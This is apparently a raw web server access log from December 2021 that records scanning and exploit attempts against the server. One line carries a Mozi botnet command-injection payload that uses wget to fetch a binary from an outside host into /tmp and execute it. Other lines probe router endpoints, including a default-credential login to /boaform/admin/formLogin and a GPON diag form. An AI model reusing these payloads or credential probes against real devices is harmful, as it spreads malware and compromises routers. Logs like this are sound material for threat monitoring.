182.116.82.174 - - [05/Dec/2021 00:57:50] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 -

31.32.120.79 - - [05/Dec/2021 02:32:42] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" HTTPStatus.BAD_REQUEST -

159.223.72.124 - - [07/Dec/2021 18:25:28] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03\x0fìN0ûcóI#Éa\x96;I')


159.223.72.124 - - [07/Dec/2021 18:25:28] "▬♥☺☺þ☺ ☺ú♥♥☼ìN0ûcóI#Éa;I êÂ¦ûrÄ♣9|CÉ»¸oø ☺<Ì¶Ì‼Ì§À0À,À(À$À¶À" HTTPStatus.BAD_REQUEST -

115.50.172.196 - - [07/Dec/2021 19:35:34] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 -


157.230.216.203 - - [08/Dec/2021 01:58:42] "GET /ab2g HTTP/1.1" 404 -

157.230.216.203 - - [08/Dec/2021 01:58:42] "GET /ab2h HTTP/1.1" 404 -





















